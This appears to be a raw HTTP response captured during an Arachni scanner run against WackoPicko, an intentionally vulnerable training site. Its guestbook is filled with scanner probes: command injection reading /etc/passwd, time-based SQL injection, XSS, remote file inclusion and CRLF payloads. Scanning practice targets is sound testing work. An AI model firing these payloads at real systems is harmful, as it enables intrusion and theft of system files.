<p> - by ' ; sleep 4 ; ' </p> <p class="comment">" && sleep 4 && "</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by " | sleep 4 | " </p> <p class="comment">" | sleep 4 | "</p> <p> - by arachni_name </p> <p class="comment">';import time;time.sleep(4000/1000);#</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ' & sleep 4 & ' </p> <p class="comment">1</p> <p> - by sleep(4000/1000); </p> <p class="comment">1</p> <p> - by arachni_name) </p> <p class="comment">1)</p> <p> - by arachni_name </p> <p class="comment">sleep 4</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by | sleep 4 | </p> <p class="comment">1</p> <p> - by sleep 4 </p> <p class="comment"> & sleep 4 & </p> <p> - by arachni_name </p> <p class="comment">1"'`--</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by && sleep 4 && </p> <p class="comment">1</p> <p> - by arachni_name"'`-- </p> <p class="comment">1</p> <p> - by ' | sleep 4 | ' </p> <p class="comment">1</p> <p> - by ' && sleep 4 && ' </p> <p class="comment">' && sleep 4 && '</p> <p> - by arachni_name </p> <p class="comment"> && sleep 4 && </p> <p> - by arachni_name </p> <p class="comment"> | sleep 4 | </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name script:;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">1</p> <p> - by arachni_name ";arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">1</p> <p> - by arachni_name script:';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">1 script:';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">1()"&%1'-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec>'</xss_ca890a60d2e09a1de6dc78b0f4d0f8ec></p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name script:";arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">1%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name</textarea>--><xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/><!--<textarea> </p> <p class="comment">1</p> <p> - by arachni_name ';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">1 script:;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/> </p> <p class="comment">1 ;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3 </p> <p class="comment">1</p> <p> - by arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E </p> <p class="comment">1</p> <p> - by arachni_name()"&%1'-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>' </p> <p class="comment">1</p> <p> - by arachni_name%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27 </p> <p class="comment">1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E</p> <p> - by arachni_name </p> <p class="comment">1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec></xss_ca890a60d2e09a1de6dc78b0f4d0f8ec></p> <p> - by arachni_name </p> <p class="comment">1--><xss_ca890a60d2e09a1de6dc78b0f4d0f8ec><!--<textarea></p> <p> - by arachni_name </p> <p class="comment">1%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3E</p> <p> - by arachni_name </p> <p class="comment">1 script:";arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">1 ";arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name ;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/? </p> <p class="comment">www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/?</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//? </p> <p class="comment">1</p> <p> - by https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/ </p> <p class="comment">http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//?</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/ </p> <p class="comment">http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///proc/self/environ </p> <p class="comment">1</p> <p> - by https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//? </p> <p class="comment">1" arachni_xss_in_tag="ca890a60d2e09a1de6dc78b0f4d0f8ec" blah="</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com </p> <p class="comment">1' arachni_xss_in_tag='ca890a60d2e09a1de6dc78b0f4d0f8ec' blah='</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name" arachni_xss_in_tag="ca890a60d2e09a1de6dc78b0f4d0f8ec" blah=" </p> <p class="comment">www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name arachni_xss_in_tag=ca890a60d2e09a1de6dc78b0f4d0f8ec blah= </p> <p class="comment">1</p> <p> - by arachni_name' arachni_xss_in_tag='ca890a60d2e09a1de6dc78b0f4d0f8ec' blah=' </p> <p class="comment">https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//?</p> <p> - by arachni_name </p> <p class="comment">1 arachni_xss_in_tag=ca890a60d2e09a1de6dc78b0f4d0f8ec blah=</p> <p> - by arachni_name </p> <p class="comment">1 ';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p> <p> - by arachni_name </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt�</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt� </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt� </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt� </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt�</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt�</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt�</p> <p> - by arachni_name </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt� </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by */; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p> <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p> <p class="comment">1</p> <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p> <p class="comment"></script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </xss_ca890a60d2e09a1de6dc78b0f4d0f8ec></p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:"</p> <p> - by arachni_name </p> <p class="comment">1'"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name]]]]]]]]] </p> <p class="comment">1]]]]]]]]]</p> <p> - by arachni_name </p> <p class="comment">1<!--</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name#^($!@$)(()))****** </p> <p class="comment">1</p> <p> - by arachni_name'" </p> <p class="comment">1</p> <p> - by arachni_name<!-- </p> <p class="comment">1#^($!@$)(()))******</p> <p> - by arachni_name </p> <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">*/; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no� </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec�</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec� </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no�</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no� </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no�</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt�</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt� </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt� </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec� </p> <p class="comment">1</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt�</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec�</p> <p> - by arachni_name </p> <p class="comment">Hi, I love your site!</p> <p> - by adam </p> <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> <input type="text" name="name" /><br> Comment: <br> <textarea id="comment-box" name="comment"></textarea> <br> <input type="submit" value="Submit" /> </form> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> --></p></div></div></body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Guestbook</h2> <h4>See what people are saying about us!</h4> <p class="comment">1</p> <p> - by " | /bin/cat /etc/passwd | " </p> <p class="comment">" ; /bin/cat /etc/passwd ; "</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by | /bin/cat /etc/passwd | </p> <p class="comment">1</p> <p> - by ; /bin/cat /etc/passwd ; </p> <p class="comment">` /bin/cat /etc/passwd`</p> <p> - by arachni_name </p> <p class="comment">" && /bin/cat /etc/passwd && "</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ' && /bin/cat /etc/passwd && ' </p> <p class="comment">1</p> <p> - by " ; /bin/cat /etc/passwd ; " </p> <p class="comment">" | /bin/cat /etc/passwd | "</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ' | /bin/cat /etc/passwd | ' </p> <p class="comment">1</p> <p> - by " && /bin/cat /etc/passwd && " </p> <p class="comment">1</p> <p> - by ` /bin/cat /etc/passwd` </p> <p class="comment">' | /bin/cat /etc/passwd | '</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";print 28763*4196403# </p> <p class="comment">print 28763*4196403;</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';print 28763*4196403# </p> <p class="comment">';print 28763*4196403#</p> <p> - by arachni_name </p> <p class="comment">print 28763*4196403</p> <p> - by arachni_name </p> <p class="comment">;print 28763*4196403</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by print 28763*4196403 </p> <p class="comment">/search.php .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by print 28763*4196403; </p> <p class="comment">1</p> <p> - by ;print 28763*4196403 </p> <p class="comment">1</p> <p> - by arachni_name';.") </p> <p class="comment">1</p> <p> - by arachni_name';waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name' where sleep(4) # </p> <p class="comment">1</p> <p> - by ";print 28763*4196403;# </p> <p class="comment">;print 28763*4196403;</p> <p> - by arachni_name </p> <p class="comment">";print 28763*4196403;#</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ;print 28763*4196403; </p> <p class="comment">1</p> <p> - by ';print 28763*4196403;# </p> <p class="comment">";print 28763*4196403#</p> <p> - by arachni_name </p> <p class="comment">';print 28763*4196403;#</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /search.php . </p> <p class="comment">1</p> <p> - by /bin/cat /etc/passwd </p> <p class="comment">1</p> <p> - by && /bin/cat /etc/passwd && </p> <p class="comment">1</p> <p> - by /WackoPicko/pictures/search.php . </p> <p class="comment">' ; /bin/cat /etc/passwd ; '</p> <p> - by arachni_name </p> <p class="comment">' && /bin/cat /etc/passwd && '</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ' ; /bin/cat /etc/passwd ; ' </p> <p class="comment"> ; /bin/cat /etc/passwd ; </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /pictures/search.php </p> <p class="comment">/bin/cat /etc/passwd</p> <p> - by arachni_name </p> <p class="comment"> && /bin/cat /etc/passwd && </p> <p> - by arachni_name </p> <p class="comment">/pictures/search.php .</p> <p> - by arachni_name </p> <p class="comment">/WackoPicko/pictures/search.php .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /pictures/search.php . </p> <p class="comment">/pictures/search.php</p> <p> - by arachni_name </p> <p class="comment">/WackoPicko/pictures/search.php</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /search.php </p> <p class="comment">1</p> <p> - by /WackoPicko/pictures/search.php </p> <p class="comment"> | /bin/cat /etc/passwd | </p> <p> - by arachni_name </p> <p class="comment">/search.php</p> <p> - by arachni_name </p> <p class="comment">1'=sleep(4)='</p> <p> - by arachni_name </p> <p class="comment">1;waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name');select pg_sleep(4); -- </p> <p class="comment">1;select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1);waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1');waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name));select pg_sleep(4); -- </p> <p class="comment">1" or sleep(4) # </p> <p> - by arachni_name </p> <p class="comment">1';select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name;waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name'=sleep(4)=' </p> <p class="comment">1"=sleep(4)="</p> <p> - by arachni_name </p> <p 